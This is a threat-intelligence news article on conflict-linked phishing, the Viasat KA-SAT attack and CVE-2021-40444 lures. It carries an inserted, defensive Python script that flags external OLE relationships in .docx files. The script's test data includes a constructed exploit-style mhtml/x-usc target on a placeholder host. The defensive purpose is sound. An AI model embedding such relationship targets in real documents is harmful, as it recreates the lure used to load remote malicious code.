A Belarusian cyber group known as Ghostwriter (also referred to as UNC1151) has been identified exploiting the recently uncovered browser-in-the-browser (BitB) technique in ongoing credential phishing attacks linked to the persistent Russo-Ukrainian conflict. This method employs a deceptive simulation of a browser window that appears legitimate, allowing attackers to execute sophisticated social engineering strategies that deceive unsuspecting users.

The Google Threat Analysis Group (TAG) highlighted in a recent report that Ghostwriter has rapidly adopted the BitB method, integrating it with pre-existing techniques that involve hosting phishing landing pages on compromised websites. This strategy facilitates the capture of sensitive login information by redirecting data to an external server controlled by the attackers.

Beyond Ghostwriter, various other threat actors have been implicated in using the backdrop of conflict as bait for phishing and malware campaigns. Groups such as Mustang Panda and Scarab, along with state-sponsored entities from Iran, North Korea, and Russia, are all employing similar tactics to lure victims into clicking on malicious links or engaging with fraudulent emails.

TAG has also attributed a hacking group known as Curious Gorge to China’s People’s Liberation Army Strategic Support Force (PLASSF) for conducting cyber operations against governmental and military targets in Ukraine, Russia, Kazakhstan, and Mongolia. Furthermore, another actor, the Russia-based COLDRIVER (or Callisto), has launched credential phishing campaigns targeting U.S. NGOs, think tanks, and various Eastern European military entities.

Billy Leonard, a TAG researcher, noted that this marks the first instance of COLDRIVER specifically targeting multiple Eastern European militaries. These campaigns utilized newly created Gmail accounts to reach non-Google email addresses, leaving the overall effectiveness of such efforts still uncertain.

Recent disclosures from Viasat, a U.S.-based telecommunications company, reveal details of a “multifaceted and deliberate” cyberattack executed against its KA-SAT network on February 24, 2022, coinciding with Russia’s invasion of Ukraine. The assault resulted in the disconnection of tens of thousands of modems, significantly impacting customers across Ukraine and Europe, including disrupting operations of approximately 5,800 wind turbines managed by Germany’s Enercon.

Viasat clarified that while the attack disrupted services, there was no indication of end-user data being accessed or compromised. The intrusion exploited a misconfiguration in a VPN appliance, allowing remote access to the KA-SAT network and executing destructive commands that temporarily rendered modems inoperable.

The series of attacks and the emergence of widespread malicious cyber activities underscore the evolving threat landscape since the onset of hostilities in Eastern Europe. Networks across both governmental and commercial sectors have endured disruptions characterized by data-wiping malware and ongoing distributed denial-of-service (DDoS) attacks.

Researchers have noted attempts to compromise legitimate WordPress sites, injecting rogue JavaScript designed to spearhead DDoS attacks against Ukrainian domains. In addition, Malwarebytes Labs recently reported on new spear-phishing assaults targeting Russian citizens and government bodies, utilizing persuasive tactics to deploy malware such as Cobalt Strike.

The spear-phishing schemes entice recipients with warnings of potential criminal charges for engaging with banned platforms, luring them into opening malicious documents that exploit the MSHTML vulnerability (CVE-2021-40444). This enables attackers to leverage PowerShell commands to deploy malicious code, thereby facilitating further breaches.
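Documents carrying the CVE-2021-40444 chain were publicly analysed at the time: the malicious part lived in the document's relationship file, an `oleObject` relationship marked `TargetMode="External"` whose target used an `mhtml:` URL with an `!x-usc:` suffix to pull remote content. The following script is an added triage example, not code from the article or from Malwarebytes, and the mhtml/x-usc pattern is taken from those public write-ups rather than from this page. It opens a `.docx` as the zip it is, reads `word/_rels/document.xml.rels`, and reports external OLE relationships; the two sample documents are constructed in memory with placeholder hosts.

```python
"""Triage a .docx for external OLE object relationships.
Added example; sample documents below are constructed, not real samples."""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
RELS_PATH = "word/_rels/document.xml.rels"
OLE_TYPE_SUFFIX = "/relationships/oleObject"


def external_ole_relationships(docx_bytes):
    """Return (target, reason) for each oleObject relationship that points
    outside the package. Any external OLE target is worth a look; the
    mhtml/x-usc form is the one publicly tied to CVE-2021-40444 lures."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if RELS_PATH not in z.namelist():
            return findings
        root = ET.fromstring(z.read(RELS_PATH))
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if not rel.get("Type", "").endswith(OLE_TYPE_SUFFIX):
            continue
        if rel.get("TargetMode", "Internal") != "External":
            continue
        target = rel.get("Target", "")
        low = target.lower()
        reason = "external OLE object"
        if low.startswith("mhtml:") or "!x-usc:" in low:
            reason += " with mhtml/x-usc target"
        findings.append((target, reason))
    return findings


def build_sample_docx(rels_xml):
    """Construct a minimal docx-shaped zip around the given rels XML (demo only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr(RELS_PATH, rels_xml)
    return buf.getvalue()


# Constructed: an ordinary document with an embedded (internal) OLE object.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
                Target="embeddings/oleObject1.bin"/>
</Relationships>"""

# Constructed: the shape of the lure, with a placeholder host.
SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
                Target="mhtml:http://placeholder.invalid/side.html!x-usc:http://placeholder.invalid/side.html"
                TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for name, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        print(name, external_ole_relationships(build_sample_docx(rels)))
```

This is a static indicator for mail gateways and incident triage, not a replacement for patching: it only reads the relationship file, so it says nothing about what the remote page would have delivered, and documents that reach the same vulnerability through other container formats need their own checks.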

The threat landscape is compounded by activity from a Russian adversary known as Carbon Spider (or FIN7), employing similar tactics aimed at deploying malware that can facilitate information theft or unauthorized access. Malwarebytes has identified a notable surge in various malware families being utilized to target both Ukrainian and Russian systems, aligning with the timeline of the ongoing conflict.

These events highlight the critical need for organizations to adopt robust cybersecurity measures and remain vigilant against evolving threats, particularly in a climate where geopolitical events can rapidly influence cyber activity. Understanding the tactics identified in the MITRE ATT&CK framework is essential for identifying potential vulnerabilities and fortifying defenses against future attacks.

“As these cybersecurity threats become increasingly sophisticated and targeted, vigilance and proactive defensive approaches have never been more critical for organizations in both Ukraine and globally,” said a representative from Malwarebytes Labs. Adopting a comprehensive cybersecurity posture can help mitigate risks and safeguard against potential incidents driven by these persistent and evolving threats.
